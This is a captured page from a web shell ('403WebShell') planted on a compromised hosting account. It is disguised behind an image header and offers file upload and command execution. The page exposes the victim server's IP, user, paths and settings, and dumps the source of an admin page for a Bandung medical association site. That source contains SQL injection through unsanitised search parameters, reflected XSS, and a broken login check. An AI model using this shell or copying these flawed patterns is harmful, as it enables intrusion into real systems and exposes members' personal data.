JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 91.108.119.145  /  Your IP : 216.73.217.31
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/d_angbaru.php
<?php  include "../koneksi.php";
  session_start();
	// cek apakah yang mengakses halaman ini sudah login
	if($_SESSION['status']<>"login"){
		header("location:location:../login.php");
	}
?>

<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">
<head>
    <title>IDI Kota Bandung</title>
    <!-- Custom fonts for this template-->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">

  <!-- Custom styles for this template-->
  <link href="css/sb-admin-2.min.css" rel="stylesheet">
  
  <!-- Custom styles for this page -->
  <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">
  

	
	
  	<style type="text/css">
	body{
		font-family: roboto;
		font-size: 11px;
	}


table {
margin: 0 auto;
border-collapse: collapse;
}

tbody {
color: #000;
}

table td {
padding: 5px 10px;
border: 1px solid #e0e0e0;
font: normal 11px Tahoma, Geneva, sans-serif;

}

table tr {
font: normal 11px Tahoma, Geneva, sans-serif;
}




/* untuk ukuran layar 700px kebawah */
@media screen and (max-width: 780px) {
	
	.header, 
	.footer{
		text-align: center;
	}
	.left {
		width: auto;
		float: none;
	}
	
	.middle {
		width: auto;
		float: none;
	}
	
	.right {
		width: auto;
		float: none;
	}

}

	</style>
    
    <style type="text/css">
/* Table demo-table */
		table {
			margin: auto;
			font-family: "Lucida Sans Unicode", "Lucida Grande", "Segoe Ui";
			font-size: 11px;
		}

		
		.table-container {
	overflow: auto;
}

/* side bar jqery*/


@media only screen and (max-width: 480px) {
    
 	table {
		width: 100%;
	}
	thead th.column-primary {
		width: 100%;
	}

	thead th:not(.column-primary) {
		display:none;
	}
	
	th[scope="row"] {
		vertical-align: top;
		
	}
	
	td {
		display: block;
		width: auto;
		text-align: right;
	}
	thead th::before {
		text-transform: uppercase;
		font-weight: bold;
		content: attr(data-header);
	}
	thead th:first-child span {
		display: none;
	}
	td::before {
		float: left;
		text-transform: uppercase;
		font-weight: bold;
		content: attr(data-header);
	}  
    
}



	
	</style>
</head>

<body id="page-top">
<body>

<!-- Page Wrapper -->
  <div id="wrapper">
  	<?php include "sidebar004.php"; ?>
    
    <!-- Content Wrapper -->
    <div id="content-wrapper" class="d-flex flex-column">

      <!-- Main Content -->
      <div id="content">
      
      <?php include "topbar.php";?>
      
      	<!-- Begin Page Content -->
        <div class="container-fluid">
          <!-- DataTales Example -->
          <div class="card shadow mb-4">
            <div class="card-header py-3">
              <h6 class="m-0 font-weight-bold text-primary">List Post</h6>
            </div>


	
	
<body>

<nav class="navbar navbar-inverse">
  <div class="container-fluid">
    <div class="navbar-header">
      <a class="navbar-brand" href="#">idikotabandung.com</a>
    </div>
  </div>
</nav>
  
<div class="container">			  
	    <center><h4>Table Daftar Progres Anggota Baru  </h4><center>
    <h4><b>IDI Kota Bandung</b></h4>
			<br>
<center><a href='dashboard004.php' class="btn btn-info btn-sm"><span class="glyphicon glyphicon-home"> </span> Home</a></center>
			<br>
  </div>
  <!--Panel Form pencarian -->
  <div class="row">
    <div class="col-md-8">
      <div class="panel panel-default">
        <div class="panel-heading"><b>Pencarian</b></div>
        <div class="panel-body">
          <form class="form-inline" >
            <div class="form-group">
              <select class="form-control" id="Kolom" name="Kolom" required="">
                <?php
                  $kolom=(isset($_GET['Kolom']))? $_GET['Kolom'] : "";
                ?>
                <option value="nmlead" <?php if ($kolom=="Nama") echo "selected"; ?>>Nama</option>
                <option value="status" <?php if ($kolom=="Status") echo "selected"; ?>>Status</option>
              </select>
            </div>
            <div class="form-group">
              <input type="text" class="form-control" id="KataKunci" name="KataKunci" placeholder="Kata kunci.." required="" value="<?php if (isset($_GET['KataKunci']))  echo $_GET['KataKunci']; ?>">
            </div>
            <button type="submit" class="btn btn-primary">Cari</button>
            <a href="d_angbaru.php" class="btn btn-danger">Reset</a>
          </form>
        </div>
      </div>
    </div>
  </div>
			
<br>	
			
			
			
  <!-- Tabel data Siswa -->
  <table class="table table-striped table-bordered table-hover">
    <thead>
      <tr>
        <th>No.</th>
	   <th>Tanggal_Reg</th>
		<th>Nama</th>
        <th>ID Anggota/
		No Reg</th>
        <th>Tahap</th>
		<th>Status</th> 
		<th>Pembayaran</th> 
		  
		<th>User_update</th> 
		 <th>Keahlian</th>
		  <th>Alamat</th>
		  <th>Telp</th>

		   
		  <th>Lama_Proses</th> 
		    <th>Cek_Status</th>
	
		
		  
		  
      </tr>
    </thead>  
    <tbody>
      <?php
      
     
      $page = (isset($_GET['page']))? (int) $_GET['page'] : 1;
      
      $kolomCari=(isset($_GET['Kolom']))? $_GET['Kolom'] : "";
     
      $kolomKataKunci=(isset($_GET['KataKunci']))? $_GET['KataKunci'] : "";

      // Jumlah data per halaman
      $limit = 10;

      $limitStart = ($page - 1) * $limit;
      
      //kondisi jika parameter pencarian kosong
      if($kolomCari=="" && $kolomKataKunci==""){
		  
		  
        $SqlQuery = mysqli_query($konek, "SELECT * FROM h_regang where status<>'finish' order by bayar,tgl_daf ASC  LIMIT ".$limitStart.",".$limit);
		  
	// $SqlQuery = mysqli_query($konek, "SELECT a.*,b.nominal as bukti FROM h_regang a, b_inv3 b where a.noreg=b.noreg AND a.status<>'finish' order by bayar,tgl_daf ASC  LIMIT ".$limitStart.",".$limit);	  
		  
		  
		  
		  
      }else{
        //kondisi jika parameter kolom pencarian diisi
        $SqlQuery = mysqli_query($konek, "SELECT * FROM h_regang where status<>'finish' AND  $kolomCari LIKE '%$kolomKataKunci%' order by bayar,tgl_daf ASC LIMIT ".$limitStart.",".$limit);
	//    $SqlQuery = mysqli_query($konek, "SELECT * FROM h_regang where nmlead LIKE '%$kolomKataKunci%'
//		OR status LIKE '%$kolomKataKunci%'	LIMIT ".$limitStart.",".$limit);	  
		  
      }
      
      $no = $limitStart + 1;
      
      while($row = mysqli_fetch_array($SqlQuery)){ 
		  
		 $tgldaf=$row['tgl_daf']; 
		  
	$time2 = new DateTime(date("Y-m-d"));
 
		  
		  $time1 = new DateTime($tgldaf);

$interval = $time1->diff($time2)->format("%r%a");


		      //$tglmasuk=  $row['tgl_reg'];
//			  $date = new DateTime($tglmasuk);
//			  $tglberkas= $date->format('d-m-Y');  
		  
      ?>
               <tr>
		  <td><?php echo $no++; ?></td>
          <td><?php echo $row['tgl_daf']?></td>  
		  <td><?php echo $row['nmlead']?></td>  
		  <td><?php echo $row['npm']?><br>	   
          <?php echo $row['noreg']?></td>
		  <td><?php echo $row['tahap']?></td>
		  <td><?php echo $row['status']?></td>
	 
		  <td><a href='valid_bayar.php?noreg=<?php echo $row['noreg']; ?>&npm=<?php echo $row['npm']; ?>'><?php echo $row['bayar']?></a></td>	<td><?php echo $row['revisi_usr']?></td>	   
				   
		 		   
		  <td><?php echo $row['ahli']?></td>
		  <td><?php echo $row['alamat']?></td>
		  <td><?php echo $row['telp']?></td>	   
		  
			<td><?php echo $interval ?> Hari</td>	   
				   
		
		<td><a class='btn btn-success btn-sm' href='stat_ang.php?noreg=<?php echo $row['noreg']; ?>&npm=<?php echo $row['npm']; ?>'>Cek Status</a></td>
		
	   
      </tr>
      <?php           
      }
      ?>
    </tbody>      
  </table>
  <div align="right">
    <ul class="pagination">
      <?php
        // Jika page = 1, maka LinkPrev disable
        if($page == 1){ 
      ?>        
        <!-- link Previous Page disable --> 
        <li class="disabled"><a href="#">Previous</a></li>
      <?php
        }
        else{ 
          $LinkPrev = ($page > 1)? $page - 1 : 1;  

          if($kolomCari=="" && $kolomKataKunci==""){
          ?>
            <li><a href="d_angbaru.php?page=<?php echo $LinkPrev; ?>">Previous</a></li>
       <?php     
          }else{
        ?> 
          <li><a href="d_angbaru.php?Kolom=<?php echo $kolomCari;?>&KataKunci=<?php echo $kolomKataKunci;?>&page=<?php echo $LinkPrev;?>">Previous</a></li>
         <?php
           } 
        }
      ?>

      <?php
        //kondisi jika parameter pencarian kosong
        if($kolomCari=="" && $kolomKataKunci==""){
         // $SqlQuery = mysqli_query($konek, "SELECT * FROM h_registrasi where status2='valid' and verifikasi2='valid'");
			
		  $SqlQuery = mysqli_query($konek, "SELECT * FROM h_regang where status<>'finish'   order by bayar,tgl_daf ASC");	

        }else{
          //kondisi jika parameter kolom pencarian diisi
          $SqlQuery = mysqli_query($konek, "SELECT * FROM h_regang where status<>'finish' AND $kolomCari LIKE '%$kolomKataKunci%' order by bayar,tgl_daf ASC");
        }     
		
		
		
		
		
		
      
        //Hitung semua jumlah data yang berada pada tabel Sisawa
        $JumlahData = mysqli_num_rows($SqlQuery);
        
        // Hitung jumlah halaman yang tersedia
        $jumlahPage = ceil($JumlahData / $limit); 
        
        // Jumlah link number 
        $jumlahNumber = 5; 

        // Untuk awal link number
        $startNumber = ($page > $jumlahNumber)? $page - $jumlahNumber : 1; 
        
        // Untuk akhir link number
        $endNumber = ($page < ($jumlahPage - $jumlahNumber))? $page + $jumlahNumber : $jumlahPage; 
        
        for($i = $startNumber; $i <= $endNumber; $i++){
          $linkActive = ($page == $i)? ' class="active"' : '';

          if($kolomCari=="" && $kolomKataKunci==""){
      ?>
          <li<?php echo $linkActive; ?>><a href="d_angbaru.php?page=<?php echo $i; ?>"><?php echo $i; ?></a></li>

      <?php
        }else{
          ?>
          <li<?php echo $linkActive; ?>><a href="d_angbaru.php?Kolom=<?php echo $kolomCari;?>&KataKunci=<?php echo $kolomKataKunci;?>&page=<?php echo $i; ?>"><?php echo $i; ?></a></li>
          <?php
        }
      }
      ?>
      
      <!-- link Next Page -->
      <?php       
       if($page == $jumlahPage){ 
      ?>
        <li class="disabled"><a href="#">Next</a></li>
      <?php
      }
      else{
        $linkNext = ($page < $jumlahPage)? $page + 1 : $jumlahPage;
       if($kolomCari=="" && $kolomKataKunci==""){
          ?>
            <li><a href="d_angbaru.php?page=<?php echo $linkNext; ?>">Next</a></li>
       <?php     
          }else{
        ?> 
           <li><a href="d_angbaru.php?Kolom=<?php echo $kolomCari;?>&KataKunci=<?php echo $kolomKataKunci;?>&page=<?php echo $linkNext; ?>">Next</a></li>
      <?php
        }
      }
      ?>
    </ul>
  </div>

 <div style="font-weight:bold;">
        Paging
        <?php
            for ($i=1; $i<=$jumlahPage ; $i++){
        ?>
            <a href="d_angbaru.php?page=<?php echo $i; ?>" style="text-decoration:none">   <u><?php echo $i; ?></u></a>
		
	
		
        <?php
            }
        ?>
    </div>
<br><br>
Total Data : <?php echo $JumlahData ?> dan  Total Halaman : <?php echo $jumlahPage ?>
</div>

 		
		
		 
					
<!-- proses edit data -->

		
   <?php include "footer.php";?>

    </div>
    <!-- End Main Content -->
    </div>
				
						 <!-- Modal Popup untuk delete--> 
<div class="modal fade" id="modal_delete">
  <div class="modal-dialog">
    <div class="modal-content" style="margin-top:100px;">
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
        <h4 class="modal-title" style="text-align:center;">Anda yakin akan menghapus data ini.. ?</h4>
      </div>
                
      <div class="modal-footer" style="margin:0px; border-top:0px; text-align:center;">
        <a href="#" class="btn btn-danger btn-sm" id="delete_link">Hapus</a>
        <button type="button" class="btn btn-success btn-sm" data-dismiss="modal">Cancel</button>
      </div>
    </div>
  </div>
</div>

<!-- Javascript untuk popup modal Delete--> 
<script type="text/javascript">
    function confirm_modal(delete_url)
    {
      $('#modal_delete').modal('show', {backdrop: 'static'});
      document.getElementById('delete_link').setAttribute('href' , delete_url);
    }
</script>   
        <script src="js/jquery.min.js"></script>
        <script src="js/bootstrap.min.js"></script>	  
    <!-- End Page Wrapper -->
   <!-- Bootstrap core JavaScript-->
  <script src="vendor/jquery/jquery.min.js"></script>
  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Core plugin JavaScript-->
  <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

  <!-- Custom scripts for all pages-->
  <script src="js/sb-admin-2.min.js"></script>

  <!-- Page level plugins -->
  <script src="vendor/datatables/jquery.dataTables.min.js"></script>
  <script src="vendor/datatables/dataTables.bootstrap4.min.js"></script>

  <!-- Page level custom scripts -->
  <script src="js/demo/datatables-demo.js"></script>
</div>	
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit